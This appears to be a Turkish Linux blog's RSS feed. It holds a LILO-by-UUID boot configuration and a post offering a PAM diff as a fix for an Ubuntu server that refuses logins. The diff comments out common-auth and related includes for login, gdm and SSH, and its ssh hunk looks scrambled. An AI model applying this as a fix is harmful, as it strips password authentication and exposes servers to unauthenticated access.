http://caylak.truvalinux.org.tr/blog/tmux-klavye-kisayollari/feed 0
LILO Disk UUID Kullanmak http://caylak.truvalinux.org.tr/blog/lilo-disk-uuid-kullanmak http://caylak.truvalinux.org.tr/blog/lilo-disk-uuid-kullanmak#respond Fri, 04 Nov 2016 23:26:15 +0000 http://caylak.truvalinux.org.tr/blog/?p=2334 Henüz test etme fırsatım olmadı denediğimde bu günlük girdisini düzenlerim.       initramfs oluşturmak.   [crayon-594ce2d95724d984778521/] /etc/lilo.conf dosyası içeriği. [crayon-594ce2d95725f708435016/]     deneyen olursa yorum kısmana yazmanızı rica ediyorum.   Kaynak : http://nil-techno.blogspot.com.tr/2012/01/using-lilo-to-boot-disks-by-uuid.html

LILO Disk UUID Kullanmak yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
Lilo_Linux_Loader-300x189Henüz test etme fırsatım olmadı denediğimde bu günlük girdisini düzenlerim.

 

 

 

initramfs oluşturmak.

 

cd /boot
mkinitrd -c
cd initrd-tree
find . | cpio -H newc -o > ../initrd.cpio

/etc/lilo.conf dosyası içeriği.

# Start LILO global section
boot = /dev/disk/by-id/ata-ST3320620AS_ABCD1234
compact
lba32
# LILO doesn't like same volume IDs of RAID 1
disk = /dev/sdb inaccessible
default = Windows
bitmap = /boot/slack.bmp
bmp-colors = 255,0,255,0,255,0
bmp-table = 60,6,1,16
bmp-timer = 65,27,0,255
# Append any additional kernel parameters:
append=" vt.default_utf8=1"
prompt
timeout = 35
# End LILO global section
 
image = /boot/vmlinuz
  append = "root=UUID=2cc11aaf-f838-4474-9d9a-f3881569f97c"
  label = Linux
  read-only
image = /boot/vmlinuz.rescue
  append = "root=UUID=2cc11aaf-f838-4474-9d9a-f3881569f97c"
  label = Rescue
  read-only
other = /dev/sda
  # Windows doesn't go to S3 sleep and has issues with backup,
  # unless it sees its disk as first in BIOS...
  boot-as = 0x80
  label = Windows
other = /dev/disk/by-id/ata-ST3320620AS_ABCD1234-part4
  label = OSX

 

 

deneyen olursa yorum kısmana yazmanızı rica ediyorum.

 

Kaynak : http://nil-techno.blogspot.com.tr/2012/01/using-lilo-to-boot-disks-by-uuid.html

LILO Disk UUID Kullanmak yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/lilo-disk-uuid-kullanmak/feed 0
Ubuntu Server Login Hatası Çözümü http://caylak.truvalinux.org.tr/blog/ubuntu-server-login-hatasi-cozumu http://caylak.truvalinux.org.tr/blog/ubuntu-server-login-hatasi-cozumu#respond Tue, 01 Nov 2016 21:09:44 +0000 http://caylak.truvalinux.org.tr/blog/?p=2327 Geçenlerde login izni vermeyen bir ubuntu server ile karşılaştım. Sunucu konsoldan veya uzak ssh ile erişme izin vermiyordu.     Çözüm üreten arkadaşa buradan saygılarımı sunuyorum. [crayon-594ce2d9578b3316917220/]    

Ubuntu Server Login Hatası Çözümü yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
ubuntu-logoGeçenlerde login izni vermeyen bir ubuntu server ile karşılaştım.

Sunucu konsoldan veya uzak ssh ile erişme izin vermiyordu.

 

 

pam-d-2016-11-02-00-01-29

Çözüm üreten arkadaşa buradan saygılarımı sunuyorum.

diff -u pam.d/gdm pam.d.new/gdm
--- pam.d/gdm	2007-04-10 23:43:51.000000000 +0300
+++ pam.d.new/gdm	2016-10-29 15:09:06.000000000 +0300
@@ -1,8 +1,6 @@
 #%PAM-1.0
 auth	requisite	pam_nologin.so
 auth	required	pam_env.so
-@include common-auth
 @include common-account
-session	required	pam_limits.so
 @include common-session
 @include common-password
diff -u pam.d/login pam.d.new/login
--- pam.d/login	2014-10-01 19:05:18.000000000 +0300
+++ pam.d.new/login	2016-10-29 17:31:44.000000000 +0300
@@ -31,7 +31,7 @@
 session       required   pam_env.so readenv=1 envfile=/etc/default/locale
 
 # Standard Un*x authentication.
-@include common-auth
+###@include common-auth
 
 # This allows certain extra groups to be granted to a user
 # based on things like time of day, tty, service, and user.
@@ -73,9 +73,9 @@
 session    optional   pam_mail.so standard
 
 # Standard Un*x account and session
-@include common-account
-@include common-session
-@include common-password
+###@include common-account
+###@include common-session
+###@include common-password
 
 # SELinux needs to intervene at login time to ensure that the process
 # starts in the proper default security context. Only sessions which are
diff -u pam.d/ssh pam.d.new/ssh
--- pam.d/ssh	2014-10-01 17:51:40.000000000 +0300
+++ pam.d.new/ssh	2016-10-29 17:25:02.000000000 +0300
@@ -2,26 +2,26 @@
 
 # Read environment variables from /etc/environment and
 # /etc/security/pam_env.conf.
-auth       required     pam_env.so # [1]
+###auth include common-password
 # In Debian 4.0 (etch), locale-related environment variables were moved to
 # /etc/default/locale, so read that as well.
-auth       required     pam_env.so envfile=/etc/default/locale
+###auth       required     pam_env.so # [1]
 
 # Standard Un*x authentication.
-auth include common-auth
+###auth       required     pam_env.so envfile=/etc/default/locale
 
 # Disallow non-root logins when /etc/nologin exists.
-account    required     pam_nologin.so
+###account    required     pam_nologin.so
 
 # Uncomment and edit /etc/security/access.conf if you need to set complex
 # access limits that are hard to express in sshd_config.
 # account  required     pam_access.so
 
 # Standard Un*x authorization.
-auth include common-account
+###auth include common-auth
 
 # Standard Un*x session setup and teardown.
-auth include common-session
+###auth include common-account
 
 # Print the message of the day upon successful login.
 session    optional     pam_motd.so # [1]
@@ -36,4 +36,4 @@
 # session  required     pam_selinux.so multiple
 
 # Standard Un*x password updating.
-auth include common-password
+auth include common-session

 

 

Ubuntu Server Login Hatası Çözümü yazısı ilk önce ÇaylakPenguen Blog üzerinde ortaya çıktı.

]]>
http://caylak.truvalinux.org.tr/blog/ubuntu-server-login-hatasi-cozumu/feed 0